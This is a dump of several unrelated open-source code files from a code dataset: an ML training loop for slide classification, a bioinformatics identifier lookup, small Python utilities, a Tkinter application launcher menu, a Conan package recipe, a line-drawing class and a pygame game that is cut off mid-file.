conf.grad_clipping)\r\n optimizer1.step()\r\n\r\n\r\n metric_logger.update(lr=optimizer0.param_groups[0]['lr'])\r\n metric_logger.update(loss0=loss0.item())\r\n metric_logger.update(loss1=loss1.item())\r\n\r\n if log_writer is not None:\r\n \"\"\" We use epoch_1000x as the x-axis in tensorboard.\r\n This calibrates different curves when batch size changes.\r\n \"\"\"\r\n log_writer.log('loss0', loss0, commit=False)\r\n log_writer.log('loss1', loss1)\r\n\r\n# Disable gradient calculation during evaluation\r\n@torch.no_grad()\r\ndef evaluate(classifier, attention, dimReduction, UClassifier, criterion, data_loader, device, conf, header, distill='MaxMinS'):\r\n\r\n # Set the network to evaluation mode\r\n classifier.eval()\r\n attention.eval()\r\n dimReduction.eval()\r\n UClassifier.eval()\r\n\r\n y_pred = []\r\n y_true = []\r\n instance_per_group = conf.total_instance // conf.numGroup\r\n\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n\r\n for data in metric_logger.log_every(data_loader, 100, header):\r\n tfeat = data['input'].to(device, dtype=torch.float32)\r\n tfeat = tfeat[0]\r\n tslideLabel = data['label'].to(device)\r\n\r\n midFeat = dimReduction(tfeat)\r\n\r\n AA = attention(midFeat, isNorm=False).squeeze(0) ## N\r\n\r\n feat_index = torch.randperm(tfeat.shape[0]).to(device)\r\n index_chunk_list = torch.tensor_split(feat_index, conf.numGroup)\r\n\r\n slide_d_feat = []\r\n\r\n\r\n for tindex in index_chunk_list:\r\n tmidFeat = midFeat.index_select(dim=0, index=tindex)\r\n\r\n tAA = AA.index_select(dim=0, index=tindex)\r\n tAA = torch.softmax(tAA, dim=0)\r\n tattFeats = torch.einsum('ns,n->ns', tmidFeat, tAA) ### n x fs\r\n tattFeat_tensor = torch.sum(tattFeats, dim=0).unsqueeze(0) ## 1 x fs\r\n\r\n patch_pred_logits = get_cam_1d(classifier, tattFeats.unsqueeze(0)).squeeze(0) ### cls x n\r\n patch_pred_logits = torch.transpose(patch_pred_logits, 0, 1) ## n x cls\r\n patch_pred_softmax = torch.softmax(patch_pred_logits, dim=1) ## n x cls\r\n\r\n _, sort_idx = torch.sort(patch_pred_softmax[:, -1], descending=True)\r\n\r\n if distill == 'MaxMinS':\r\n topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx_min = sort_idx[-instance_per_group:].long()\r\n topk_idx = torch.cat([topk_idx_max, topk_idx_min], dim=0)\r\n d_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx)\r\n slide_d_feat.append(d_inst_feat)\r\n elif distill == 'MaxS':\r\n topk_idx_max = sort_idx[:instance_per_group].long()\r\n topk_idx = topk_idx_max\r\n d_inst_feat = tmidFeat.index_select(dim=0, index=topk_idx)\r\n slide_d_feat.append(d_inst_feat)\r\n elif distill == 'AFS':\r\n slide_d_feat.append(tattFeat_tensor)\r\n\r\n slide_d_feat = torch.cat(slide_d_feat, dim=0)\r\n\r\n gSlidePred = UClassifier(slide_d_feat)\r\n allSlide_pred_softmax = torch.softmax(gSlidePred, dim=1)\r\n\r\n\r\n\r\n loss = criterion(allSlide_pred_softmax, tslideLabel)\r\n acc1 = accuracy(allSlide_pred_softmax, tslideLabel, topk=(1,))[0]\r\n metric_logger.update(loss=loss.item())\r\n metric_logger.meters['acc1'].update(acc1.item(), n=1)\r\n\r\n\r\n y_pred.append(allSlide_pred_softmax)\r\n y_true.append(tslideLabel)\r\n\r\n y_pred = torch.cat(y_pred, dim=0)\r\n y_true = torch.cat(y_true, dim=0)\r\n\r\n AUROC_metric = torchmetrics.AUROC(num_classes = conf.n_class, average = 'macro').to(device)\r\n AUROC_metric(y_pred, y_true)\r\n auroc = AUROC_metric.compute().item()\r\n F1_metric = torchmetrics.F1Score(num_classes = conf.n_class, average = 'macro').to(device)\r\n F1_metric(y_pred, y_true)\r\n f1_score = F1_metric.compute().item()\r\n\r\n print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f} auroc {AUROC:.3f} f1_score {F1:.3f}'\r\n .format(top1=metric_logger.acc1, losses=metric_logger.loss, AUROC=auroc, F1=f1_score))\r\n\r\n return auroc, metric_logger.acc1.global_avg, f1_score, metric_logger.loss.global_avg\r\n\r\n\r\ndef main():\r\n # Load config file\r\n args = get_arguments()\r\n\r\n # get config\r\n with open(args.config, \"r\") as ymlfile:\r\n c = yaml.load(ymlfile, Loader=yaml.FullLoader)\r\n c.update(vars(args))\r\n conf = Struct(**c)\r\n\r\n\r\n group_name = 'ds_%s_%s_arch_dtfd-mil_%sepochs' % (conf.dataset, conf.pretrain, conf.train_epoch)\r\n log_writer = Wandb_Writer(group_name=group_name, mode=args.wandb_mode, name=args.seed)\r\n conf.ckpt_dir = log_writer.wandb.dir[:-5] + 'saved_models'\r\n if conf.wandb_mode == 'disabled':\r\n conf.ckpt_dir = os.path.join(conf.ckpt_dir, group_name)\r\n os.makedirs(conf.ckpt_dir, exist_ok=True)\r\n print(\"Used config:\");\r\n pprint(vars(conf));\r\n\r\n # Prepare dataset\r\n set_seed(args.seed)\r\n\r\n # define datasets and dataloaders\r\n train_data, val_data, test_data = build_HDF5_feat_dataset(os.path.join(conf.data_dir, 'patch_feats_pretrain_%s.h5'%conf.pretrain), conf)\r\n\r\n train_loader = DataLoader(train_data, batch_size=conf.B, shuffle=True,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=True)\r\n val_loader = DataLoader(val_data, batch_size=conf.B, shuffle=False,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=False)\r\n test_loader = DataLoader(test_data, batch_size=conf.B, shuffle=False,\r\n num_workers=conf.n_worker, pin_memory=conf.pin_memory, drop_last=False)\r\n\r\n # define network\r\n classifier = Classifier_1fc(conf.D_inner, conf.n_class, 0).to(device)\r\n attention = Attention(conf.D_inner).to(device)\r\n dimReduction = DimReduction(conf.D_feat, conf.D_inner).to(device)\r\n attCls = Attention_with_Classifier(L=conf.D_inner, num_cls=conf.n_class, droprate=0).to(device)\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n trainable_parameters = []\r\n trainable_parameters += list(classifier.parameters())\r\n trainable_parameters += list(attention.parameters())\r\n trainable_parameters += list(dimReduction.parameters())\r\n\r\n optimizer_adam0 = torch.optim.Adam(trainable_parameters, lr=conf.lr, weight_decay=conf.wd)\r\n optimizer_adam1 = torch.optim.Adam(attCls.parameters(), lr=conf.lr, weight_decay=conf.wd)\r\n\r\n best_state = {'epoch':-1, 'val_acc':0, 'val_auc':0, 'val_f1':0, 'test_acc':0, 'test_auc':0, 'test_f1':0}\r\n for epoch in range(conf.train_epoch):\r\n\r\n train_one_epoch(classifier, attention, dimReduction, attCls,\r\n criterion, train_loader, optimizer_adam0, optimizer_adam1, device, epoch, conf, log_writer)\r\n\r\n\r\n val_auc, val_acc, val_f1, val_loss = evaluate(classifier, attention, dimReduction, attCls, criterion, val_loader, device, conf, 'Val')\r\n test_auc, test_acc, test_f1, test_loss = evaluate(classifier, attention, dimReduction, attCls, criterion, test_loader, device, conf, 'Test')\r\n\r\n if log_writer is not None:\r\n log_writer.log('perf/val_acc1', val_acc, commit=False)\r\n log_writer.log('perf/val_auc', val_auc, commit=False)\r\n log_writer.log('perf/val_f1', val_f1, commit=False)\r\n log_writer.log('perf/val_loss', val_loss, commit=False)\r\n log_writer.log('perf/test_acc1', test_acc, commit=False)\r\n log_writer.log('perf/test_auc', test_auc, commit=False)\r\n log_writer.log('perf/test_f1', test_f1, commit=False)\r\n log_writer.log('perf/test_loss', test_loss, commit=False)\r\n\r\n if val_f1 + val_auc > best_state['val_f1'] + best_state['val_auc']:\r\n best_state['epoch'] = epoch\r\n best_state['val_auc'] = val_auc\r\n best_state['val_acc'] = val_acc\r\n best_state['val_f1'] = val_f1\r\n best_state['test_auc'] = test_auc\r\n best_state['test_acc'] = test_acc\r\n best_state['test_f1'] = test_f1\r\n # log_writer.summary('best_acc', val_acc)\r\n # save_model(\r\n # conf=conf, model=net, optimizer=optimizer, epoch=epoch, is_best=True)\r\n print('\\n')\r\n\r\n # save_model(\r\n # conf=conf, model=net, optimizer=optimizer, epoch=epoch, is_last=True)\r\n print(\"Results on best epoch:\")\r\n print(best_state)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dazhangyu123/ACMIL","sub_path":"Step3_WSI_classification_DTFD.py","file_name":"Step3_WSI_classification_DTFD.py","file_ext":"py","file_size_in_byte":14863,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"21815022456","text":"#!/usr/bin/env python\n\n#\n#\n#\n#\n#\n\n#\n# IMPORT SOURCES:\n#\n#\n\n#\n# Get FMA identifiers.\n#\n\n# PRE-CODE\nimport faulthandler\nfaulthandler.enable()\n\n# IMPORTS\n\n# Imports for recognizing modules.\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../..\"))\n\n# Import modules.\nfrom gnomics.objects.user import User\nimport gnomics.objects.tissue\n\n# Other imports.\nimport json\nimport requests\nimport timeit\nimport urllib.error\nimport urllib.parse\nimport urllib.request\n\n# MAIN\ndef main():\n fma_unit_tests(\"TS-0171\", \"\", \"\")\n \n# Get FMA identifier.\ndef get_fma_id(tissue, user = None):\n fma_array = []\n \n for iden in gnomics.objects.auxiliary_files.identifier.filter_identifiers(tissue.identifiers, [\"fma\", \"fma id\", \"fmaid\", \"fma identifier\"]):\n if iden[\"identifier\"] not in fma_array:\n fma_array.append(iden[\"identifier\"])\n \n if fma_array:\n return fma_array\n \n ids_completed = []\n for ident in tissue.identifiers:\n if (ident[\"identifier_type\"].lower() in [\"caloha\", \"caloha id\", \"caloha identifier\"]) and ident[\"identifier\"] not in ids_completed:\n ids_completed.append(ident[\"identifier\"])\n for xref in gnomics.objects.tissue.Tissue.caloha_obj(tissue, user = user)[\"primaryTopic\"][\"hasDbXref\"]:\n if \"FMA\" in xref:\n gnomics.objects.tissue.Tissue.add_identifier(tissue, identifier = xref, identifier_type = \"FMA ID\", source = \"OpenPHACTS\")\n fma_array.append(xref)\n \n return fma_array\n\n# UNIT TESTS\ndef fma_unit_tests(caloha_id, openphacts_app_id, openphacts_app_key):\n user = User(openphacts_app_id = openphacts_app_id, openphacts_app_key = openphacts_app_key)\n \n caloha_tiss = gnomics.objects.tissue.Tissue(identifier = caloha_id, identifier_type = \"CALOHA ID\", source = \"OpenPHACTS\")\n for fma in get_fma_id(caloha_tiss, user = user):\n print(\"- %s\" % fma)\n \n# MAIN\nif __name__ == \"__main__\": main()","repo_name":"Superraptor/Gnomics","sub_path":"gnomics/objects/tissue_files/fma.py","file_name":"fma.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"2975599387","text":"import copy\n\ndef get_data():\n\tl = []\n\twhile True:\n\t\tdata = input('value: ')\n\t\tif data=='q':\n\t\t\tbreak\n\t\ttry:\n\t\t\tdata = float(data)\n\t\texcept:\n\t\t\tcontinue\n\t\tl.append(data)\n\treturn l\n\ndef mean(data):\n\treturn sum(data)/len(data)\n\ndef median(data):\n\tdata_c = copy.copy(data)\n\tdata_c.sort()\n\treturn data_c[int(len(data_c)/2)]\n\ndef std_dev(data, avg):\n\tsum_dev_sqr = 0\n\tfor num in data:\n\t\tdev = avg - num\n\t\tsum_dev_sqr = sum_dev_sqr + dev * dev\n\treturn sqrt(sum_dev_sqr/(len(data)-1))\n\n\ndef main():\n\tdata = get_data()\n\tprint(data)\n\tprint(median(data))\n\nmain()\n\n","repo_name":"vlaksi/OsnovneRacunarstva-BMI","sub_path":"Predavanja/08 Kolekcije podataka/Predavanja/p/primer1.py","file_name":"primer1.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24908823684","text":"#!/usr/bin/env python3\n# TkRootMenu.py (tsouchlarakis@gmail.com) A custom menu\n# MIT License\n# alsa-utils, sudo, ssh-askpass, xscreensaver, xdotool\n\nimport os, sys, shutil\n#from PIL import ImageTk, Image\nfrom tkinter import Tk, Button, Scale, Menu, HORIZONTAL, TRUE, FALSE, E, W, S, N\nfrom Executables import __sudo_cmd__, __terminal__, __editor__, __file_manager__, __browser__, __basic__, __net__, __dev__, __media__, __games__, __fs__, __admin__, __utils__, __config__, __help__, __pc_options__\n\nncnss = \"0\"\n\ndef runCommand(app, prm=\"\", hlpr=0, sudo=0):\n\n runstr = \"\"\n\n if sudo == 1: # Prefix sudo\n runstr += __sudo_cmd__ + \" \"\n\n runstr += \"nice -n \" + ncnss + \" \"\n\n if hlpr == 1: # Append helper\n runstr += __terminal__ + \" -e \"\n elif hlpr == 2:\n runstr += __editor__ + \" \"\n elif hlpr == 3:\n runstr += __file_manager__ + \" \"\n elif hlpr == 4:\n runstr += __browser__ + \" \"\n\n runstr += app + \" \" + prm + \" &\" # Postfix app, params and background\n\n print(runstr)\n os.system(runstr)\n\nclass TkRootMenu(Tk):\n\n def __init__(self, master):\n\n self.master = master\n\n self.master.title(\"Root Menu\")\n\n opts = ((\"*resizable\", FALSE), (\"*tearOff\", FALSE))\n\n for opt, cond in opts:\n self.master.option_add(opt, cond)\n\n self.master.geometry('105x50+64+64')\n\n #self.u = Button(master, width=1, height=1, text=u\"\\u21E7\", command=lambda: runCommand(\"xdotool key 'Super_L+Up'\"))\n self.l = Button(master, width=3, height=1, text=u\"\\u21E6\", command=lambda: runCommand(\"xdotool key 'Super_L+Left'\"))\n self.r = Button(master, width=3, height=1, text=u\"\\u21E8\", command=lambda: runCommand(\"xdotool key 'Super_L+Right'\"))\n #self.d = Button(master, width=1, height=1, text=u\"\\u21E9\", command=lambda: runCommand(\"xdotool key 'Super_L+Down'\"))\n\n self.v = Scale(master, from_=0, to=100, orient=HORIZONTAL, showvalue=0, command=self.setVlm)\n\n #self.n = Scale(master, from_=0, to=19 , orient=HORIZONTAL, showvalue=0, command=self.setNcs)\n\n #self.u.grid(row=0, sticky=N)\n self.l.grid(row=0, sticky=W)\n self.r.grid(row=0, sticky=E)\n #self.d.grid(row=0, sticky=S)\n\n self.v.grid(row=1)\n\n #self.n.grid(row=2)\n\n self.v.set(75)\n #self.n.set(19)\n\n binds = (\n (\"\", self.on_accel_runBrowser),\n (\"\", self.on_accel_runTerminal),\n (\"\", self.on_accel_runFileManager),\n (\"\", self.on_accel_runEditor))\n\n for keys, envt in binds:\n self.master.bind_all(keys, envt)\n\n menubar = Menu(master)\n\n appsmenu = Menu(menubar)\n\n menubar.add_cascade(label=\"Root Menu\", menu=appsmenu)\n\n # Basic apps\n for lbl, cmmnd, k in __basic__:\n if shutil.which(cmmnd) is not None:\n appsmenu.add_command(label=lbl, accelerator=k, command=lambda param=cmmnd: runCommand(param))\n\n appsmenu.add_separator()\n\n # Internet\n netmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __net__:\n if shutil.which(cmmnd) is not None:\n netmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Dev menu\n devmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __dev__:\n if shutil.which(cmmnd) is not None:\n devmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Multimedia\n mmmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __media__:\n if shutil.which(cmmnd) is not None:\n mmmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Games menu\n gammenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __games__:\n if shutil.which(cmmnd) is not None:\n gammenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # File system tools\n toolsmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __fs__:\n if shutil.which(cmmnd) is not None:\n toolsmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Admin tools\n adminmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __admin__:\n adminmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp, 1))\n\n # Util Menu\n utilmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __utils__:\n if shutil.which(cmmnd) is not None:\n utilmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Config Menu\n configmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __config__:\n if shutil.which(cmmnd) is not None:\n configmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Help Menu\n helpmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __help__:\n if shutil.which(cmmnd) is not None:\n helpmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Menu\n menumenu = Menu(menubar)\n menumenu.add_command(label=\"Edit Menu\", command=lambda: runCommand(__editor__ + \" \" + sys.argv[0]))\n menumenu.add_command(label=\"Refresh Menu\", command=self.runRfs)\n menumenu.add_command(label=\"Close Menu\", command=self.master.quit)\n\n # PC\n pcmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr, adm in __pc_options__:\n pcmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr, sd=adm: runCommand(param, arg, hlp, sd))\n\n self.groups = (\n (\"Internet\", netmenu),\n (\"Development\", devmenu),\n (\"Mediums\", mmmenu),\n (\"Games\", gammenu),\n (\"File System\", toolsmenu),\n (\"Admin Tools\", adminmenu),\n (\"Utilities\", utilmenu),\n (\"Config\", configmenu),\n (\"Help\", helpmenu),\n (\"Menu\", menumenu),\n (\"PC Menu\",pcmenu))\n\n # Groups\n for lbl, mnGrp in self.groups:\n appsmenu.add_cascade(label=lbl, menu=mnGrp)\n\n appsmenu.add_separator()\n\n appsmenu.add_command(label=\"Lock Screen\", command=lambda: runCommand(\"xscreensaver-command -lock\"))\n\n self.master.config(menu=menubar)\n\n # Menu\n def runRfs(self):\n app = sys.argv[0]\n runCommand(app)\n self.master.quit()\n\n # Accelearator definitions\n def on_accel_runTerminal(self, widget):\n runCommand(__terminal__)\n def on_accel_runEditor(self, widget):\n runCommand(__editor__)\n def on_accel_runFileManager(self, widget):\n runCommand(__file_manager__)\n def on_accel_runBrowser(self, widget):\n runCommand(__browser__)\n\n # Volume\n def setVlm(self, widget):\n app = \"amixer set 'Master' \" + str(self.v.get()) + \"%\"\n runCommand(app)\n\nif __name__ == \"__main__\":\n master = Tk()\n myMenu = TkRootMenu(master)\n master.mainloop()\n","repo_name":"michaeltd/pythonRootMenu","sub_path":"TkRootMenu.py","file_name":"TkRootMenu.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31933094305","text":"from conan import ConanFile\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.files import chdir, copy, get, rename, rmdir\nfrom conan.tools.layout import basic_layout\nimport os\n\nrequired_conan_version = \">=1.50.0\"\n\n\nclass BlazeConan(ConanFile):\n name = \"blaze\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://bitbucket.org/blaze-lib/blaze\"\n description = \"open-source, high-performance C++ math library for dense and sparse arithmetic\"\n topics = (\"blaze\", \"math\", \"algebra\", \"linear algebra\", \"high-performance\")\n license = \"BSD-3-Clause\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n no_copy_source = True\n\n def package_id(self):\n self.info.clear()\n\n def validate(self):\n if self.settings.compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, 14)\n\n def layout(self):\n basic_layout(self, src_folder=\"src\")\n\n def source(self):\n base_source_dir = os.path.join(self.source_folder, os.pardir)\n get(self, **self.conan_data[\"sources\"][self.version],\n destination=base_source_dir, strip_root=True)\n with chdir(self, base_source_dir):\n rmdir(self, self.source_folder)\n rename(self, src=f\"blaze-{self.version}\", dst=self.source_folder)\n\n def build(self):\n pass\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n copy(self, \"blaze/*.h\", src=self.source_folder, dst=os.path.join(self.package_folder, \"include\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"blaze\")\n self.cpp_info.set_property(\"cmake_target_name\", \"blaze::blaze\")\n self.cpp_info.bindirs = []\n self.cpp_info.frameworkdirs = []\n self.cpp_info.libdirs = []\n self.cpp_info.resdirs = []\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/blaze/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"21196524093","text":"import operator\nfrom PIL import Image\n\n\nclass graphicsWindow:\n\n def __init__(self, width=640, height=480):\n self.__mode = 'RGB'\n self.__width = width\n self.__height = height\n self.__canvas = Image.new(self.__mode, (self.__width, self.__height))\n self.__image = self.__canvas.load()\n\n def drawPoint(self, point, color):\n if 0 <= point[0] < self.__width and 0 <= point[1] < self.__height:\n self.__image[point[0], point[1]] = color\n\n # returns the x value of the line point as an integer\n def getX(self, point):\n return int(point.get(0, 0))\n\n # returns the y value of the line point as an integer\n def getY(self, point):\n return int(point.get(1, 0))\n\n # This method uses bresenham's line algorithm to draw a line given two points and the line colour.\n def drawLine(self, point1, point2, color):\n # Get the x and y coords of each point passed to the draw line method\n x1 = self.getX(point1)\n x2 = self.getX(point2)\n y1 = self.getY(point1)\n y2 = self.getY(point2)\n\n # Define the rise and run of the line\n rise = y2 - y1\n run = x2 - x1\n\n # If the line is vertical, the run is 0, therefore, no m value is calculated. First determine if the line goes\n # up or down and then draw each point.\n if run == 0:\n if y2 < y1:\n y1, y2 = (y2, y1)\n for y in range(y1, y2 + 1):\n self.drawPoint((x1, y), color)\n else:\n m = float(rise) / run\n # if the slope is positive, aka the line goes up, make the adjust value positive, else negative, also set\n # the offset to 0\n adjust = 1 if m >= 0 else -1\n offset = 0\n # if the abs value of the run is larger than the rise, determine the line direction and plot each line point\n # based on the run, the offset/adjust will account will account for changes in the y-value based on the\n # line slope\n if 1 >= m >= -1:\n delta = abs(rise) * 2\n threshold = abs(run)\n thresholdInc = abs(run) * 2\n y = y1\n if x2 < x1:\n x1, x2 = (x2, x1)\n y = y2\n for x in range(x1, x2 + 1):\n self.drawPoint((x, y), color)\n offset += delta\n if offset >= threshold:\n y += adjust\n threshold += thresholdInc\n # if the abs value of the rise is larger than the run, determine the line direction and plot each line point\n # based on the rise, the offset/adjust will account will account for changes in the x-value based on the\n # line slope\n else:\n delta = abs(run) * 2\n threshold = abs(rise)\n thresholdInc = abs(rise) * 2\n x = x1\n if y2 < y1:\n y1, y2 = (y2, y1)\n x = x2\n for y in range(y1, y2 + 1):\n self.drawPoint((x, y), color)\n offset += delta\n if offset >= threshold:\n x += adjust\n threshold += thresholdInc\n\n def saveImage(self, fileName):\n self.__canvas.save(fileName)\n\n def showImage(self):\n self.__canvas.show()\n\n def getWidth(self):\n return self.__width\n\n def getHeight(self):\n return self.__height\n","repo_name":"MatteoTanziCodes/School-Western","sub_path":"Year 3/3388/assignment1/graphicsWindow.py","file_name":"graphicsWindow.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72296915129","text":"#!/usr/bin/env python3\n\nfrom numpy import pi, cos, sqrt, zeros\n\ncoefficients = zeros((8, 8))\n\n# Genereate the coefficient matrix\ncoefficients[0] = sqrt(0.125)\nfor j in range(1, 8):\n\tfor i in range(8):\n\t\tcoefficients[j][i] = 0.5*cos(i*(2*j + 1)*pi/16.0)\n\n# Print out the matrix\nprint(\"{\")\nfor j in range(8):\n\tprint(\" {\", end = \" \")\n\tfor i in range(8):\n\t\tprint(\"%ff\" % coefficients[j][i], end = (\", \" if i != 7 else \"\"))\n\tprint(\"}\", end = \", \\n\" if j != 7 else \"\\n\")\nprint(\"}\")\n","repo_name":"fhtuft/jpeg","sub_path":"util/dct_table_generator.py","file_name":"dct_table_generator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8465311038","text":"import pygame\nimport random\nfrom pygame.locals import *\nfrom prey import *\nfrom lion import *\nfrom hunter import *\n\n#reactions possible for catching prey\neat = ['Delicious!', 'Mmmm', 'Tasty', 'I\\'ve caught you!', 'You\\'ll never escape!', 'You will make a fine dinner']\n\n#when hunter touches lion\nhurt = ['Ahh!', 'That hurt!', 'You are a BAD hunter!', 'Please don\\'t hurt me!', 'Ouch!']\n\n# react = random.randint(0, len(die) - 1)\n# dieReaction = die[react]\n\n#when hunter kills lion\ndie = ['Nooooooo', 'Why?', 'I have a family!']\n\n# start score\nscorePoint = 0\n\n# start health\nhp = 20\n\npygame.init()\n\n# Clock to set framerate\nclock = pygame.time.Clock()\n\n# makes screen info\nscreen_info = pygame.display.Info()\n\n# set size of game board to screen size\nscreen_size = (width, height) = (screen_info.current_w, screen_info.current_h)\n\n# set screen to screen size\nscreen = pygame.display.set_mode(screen_size)\n\n#color of background\ncolor = (235, 204, 52)\n\n#color of background when you win\nnewColor = (66,103,149)\n\n#color of background when you die\ndieColor = (228,89,69)\n\n#tect color and background color\ntextColor=(50,254,30)\ntxtBackgroundColor=(94,0,4)\n\n#stuff for the score\nscoreColor = (184,240,161)\nscoreBackground = (7,84,152)\n\n#color of win text\nwinColor = (152,195,225)\nwinBackgroundColor = (66,103,149)\n\n#color of die text\ndeathColor = (223,245,128)\ndeathBackgroundColor = (228,89,69)\n\n#color of hurt text\nouchColor = (244,201,12)\nouchBack = (140,219,246)\n\n#stuff for hp\nhpColor = (184,240,161)\nhpBackgroundColor = (7,84,152)\n\nplayer = Lion((150,180))\n\n# loading the prey image\nprey_image = pygame.image.load(\"prey.jpg\")\nprey_image = pygame.transform.smoothscale(prey_image, (100, 100))\n\nprey_rect = prey_image.get_rect()\n\n# places image\nprey_rect.center = (width//2, height//2)\n\n#variables to move prey\nspeed = pygame.math.Vector2(10, 6)\nrotation = random.randint(0, 360)\nspeed.rotate_ip(rotation)\n\npygame.transform.rotate(prey_image, 180 - rotation)\n\n#The reason it is used insetad of the array is because\n#it uses a sprite, which has built in stuff that is needed\n#for collision code\n\n#prey created\npreys = pygame.sprite.Group() \n\n#hunters created\nhunters = pygame.sprite.Group()\n\n#moves the prey\ndef move_prey():\n global prey_image\n screen_info = pygame.display.Info()\n prey_rect.move_ip(speed)\n\n # IF PREY HITS TOP OR BOTTOM\n if prey_rect.top < 0 or prey_rect.bottom > screen_info.current_h:\n #go the opposite direction\n speed[1] *= -1\n prey_rect.move_ip(0, speed[1])\n #updates it\n prey_image = pygame.transform.flip(prey_image, True, False)\n\n # IF PREY HITS LEFT OR RIGHT\n if prey_rect.left < 0 or prey_rect.right > screen_info.current_w:\n #go the opposite direction\n speed[0] *= -1\n prey_rect.move_ip(speed[0], 0)\n #updates it\n prey_image = pygame.transform.flip(prey_image, False, True)\n\n\n# game code\ndef main():\n #while true == will always run\n while True:\n \n clock.tick(60)\n global scorePoint\n global scoreAPoint\n global hp\n global myHp\n myHp = (\"Health is: \" + str(hp))\n scoreAPoint = (\"Score is: \" + str(scorePoint))\n\n for event in pygame.event.get():\n if event.type == quit:\n sys.exit()\n if event.type == MOUSEBUTTONDOWN:\n # determines if hunter spawns\n num = random.randint(0, 1234)\n if num % 2 == 0:\n hunters.add(Hunter(event.pos))\n else:\n #adds prey\n preys.add(Prey(event.pos))\n \n if event.type == KEYUP:\n if event.key == K_UP:\n player.speed[1]=0 \n if event.key == K_DOWN:\n player.speed[1]=0 \n if event.key==K_LEFT:\n player.speed[0]=0\n if event.key==K_RIGHT:\n player.speed[0]=0\n if event.type == KEYDOWN:\n if event.key == K_UP:\n player.speed[1]=-15\n if event.key == K_DOWN:\n player.speed[1]=15 \n if event.key==K_LEFT:\n player.speed[0]=-15\n if event.key==K_RIGHT:\n player.speed[0]=15\n\n move_prey()\n #makes background color\n screen.fill(color)\n screen.blit(prey_image, prey_rect)\n\n for prey in preys:\n prey.update()\n for prey in preys:\n prey.draw(screen)\n\n for hunter in hunters:\n hunter.update()\n for hunter in hunters:\n hunter.draw(screen)\n\n screen.blit(player.image,player.rect)\n player.update()\n\n hit_hunter = pygame.sprite.spritecollide(player,hunters,True)\n screen.blit(player.image,player.rect)\n if hit_hunter:\n #picks a reaction\n getHurt = random.randint(0, len(hurt) -1)\n hurtReaction = hurt[getHurt]\n\n font = pygame.font.Font('freesansbold.ttf', 32) \n ouch = font.render(hurtReaction, True, ouchColor, ouchBack)\n ouchRect = ouch.get_rect() \n ouchRect.center = (width // 2, 550)\n screen.blit(ouch,ouchRect)\n\n hp = hp -1\n\n get_hit=pygame.sprite.spritecollide(player,preys,True)\n screen.blit(player.image,player.rect)\n if get_hit:\n # picks a reaction\n num = random.randint(0, len(eat) - 1)\n devour = eat[num]\n\n #stuff for font\n font = pygame.font.Font('freesansbold.ttf', 32) \n text = font.render(devour, True, textColor, txtBackgroundColor)\n textRect = text.get_rect() \n textRect.center = (width // 2, 550)\n screen.blit(text,textRect)\n\n #adds a to the score point every time\n scorePoint += 1\n \n #same as text\n scoreFont = pygame.font.Font('freesansbold.ttf', 32) \n score = 